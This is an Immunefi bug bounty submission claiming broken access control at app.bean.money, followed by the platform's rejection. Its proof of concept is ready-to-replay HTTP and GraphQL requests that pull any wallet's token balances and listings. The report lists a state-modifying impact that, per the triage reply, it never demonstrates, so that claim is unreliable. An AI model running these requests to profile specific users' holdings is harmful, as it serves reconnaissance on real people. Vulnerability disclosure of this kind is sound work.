Report #35516

Report Date

September 25, 2024

Status

Closed

Payout

Unsecure Design + Broken Access in https://app.bean.money

‣

Report Info

Immunefi Response

We have reviewed your report and regret to inform you that we will have to close it due to inadequate proof of concept (PoC).
Immunefi review:
assessed impact by the triage team is not in scope for the bug bounty program
assessed asset by the triage team is in scope for the bug bounty program
The submitted PoC is inadequate for the described issue.
Technical Review:
The PoC doesn't demonstrate state modifying action and neither highlight a bug unless proved.
To ensure the proper escalation and evaluation of your report, Immunefi has checked the PoC to see if it matches the assessed impact and bug description, as well as verified the accuracy of your claims.
Please note that the project's team will receive a report of the closed submission and may choose to re-open it at their discretion. However, they are under no obligation to do so.

Unsecure Design + Broken Access in https://app.bean.money

‣

Report Info

Report ID

#35516

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

Taking state-modifying authenticated actions (with or without blockchain state interaction) on behalf of other users without any interaction by that user, such as voting in governance

Description

The web-api of https://app.bean.money is vulnerable to Broken Access functionalities. By accessing certain URIs, an attacker can view the unripe tokens of any account, as long as they have the wallet address. Additionally, an attacker can view the fertilizer balances and Pod information of any wallet without proper session authorization checks.

Impact

An attacker can view fertilizer balance of any account, without authenticating or having permission to access the account. This is most useful for reconnaissance purposes.
The vulnerability could also be used to harvest sensitive information, such as wallet addresses and token balances.

Proof of concept

Replay each of the following requests below to affirm exploit. Replace <<ACCOUNT>> with victim account.

https://app.bean.money/.netlify/functions/pick?account=<<ACCOUNT>>

https://app.bean.money/.netlify/functions/unripe?account=<<ACCOUNT>>

Replay the below graphQL API requests as well:

POST /subgraphs/name/beanstalk-dev HTTP/1.1
Host: graph.node.bean.money
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Referer: https://app.bean.money/
Content-Type: application/json
Origin: https://app.bean.money
Content-Length: 367

{"operationName":"FertilizerBalances","variables":{"account":"<<ACCOUNT>>"},"query":"query FertilizerBalances($account: String) {\n  fertilizerBalances(where: {farmer: $account}) {\n    amount\n    fertilizerToken {\n      id\n      endBpf\n      season\n      humidity\n      startBpf\n      __typename\n    }\n    __typename\n  }\n}"}

POST /subgraphs/name/beanstalk-dev HTTP/1.1
Host: graph.node.bean.money
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Referer: https://app.bean.money/
Content-Type: application/json
Origin: https://app.bean.money

{"operationName":"FarmerSiloAssetSnapshots","variables":{"account":"<<ACCOUNT>>"},"query":"query FarmerSiloAssetSnapshots($account: ID!) {\n  farmer(id: $account) {\n    silo {\n      assets {\n        token\n        hourlySnapshots(orderBy: season, orderDirection: asc) {\n          id\n          season\n          deltaDepositedBDV\n          deltaDepositedAmount\n          depositedBDV\n          createdAt\n          __typename\n        }\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}"}

POST /subgraphs/name/beanstalk-dev HTTP/1.1
Host: graph.node.bean.money
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Referer: https://app.bean.money/
Content-Type: application/json
Origin: https://app.bean.money

{"operationName":"FarmerPodListings","variables":{"first":1000,"account":"<<ACCOUNT>>","createdAt_gt":0},"query":"query FarmerPodListings($first: Int = 1000, $createdAt_gt: BigInt, $account: String!) {\n  podListings(\n    first: $first\n    where: {createdAt_gt: $createdAt_gt, farmer: $account, status_not: FILLED_PARTIAL}\n  ) {\n    ...PodListing\n    __typename\n  }\n}\n\nfragment PodListing on PodListing {\n  id\n  farmer {\n    id\n    __typename\n  }\n  historyID\n  index\n  start\n  mode\n  pricingType\n  pricePerPod\n  pricingFunction\n  maxHarvestableIndex\n  minFillAmount\n  originalIndex\n  originalAmount\n  filled\n  amount\n  remainingAmount\n  filledAmount\n  status\n  createdAt\n  updatedAt\n  creationHash\n  __typename\n}"}

Immunefi Response

We have reviewed your report and regret to inform you that we will have to close it due to inadequate proof of concept (PoC).

Immunefi review:

assessed impact by the triage team is not in scope for the bug bounty program
assessed asset by the triage team is in scope for the bug bounty program
The submitted PoC is inadequate for the described issue.
Technical Review:
The PoC doesn't demonstrate state modifying action and neither highlight a bug unless proved.

To ensure the proper escalation and evaluation of your report, Immunefi has checked the PoC to see if it matches the assessed impact and bug description, as well as verified the accuracy of your claims.

Please note that the project's team will receive a report of the closed submission and may choose to re-open it at their discretion. However, they are under no obligation to do so.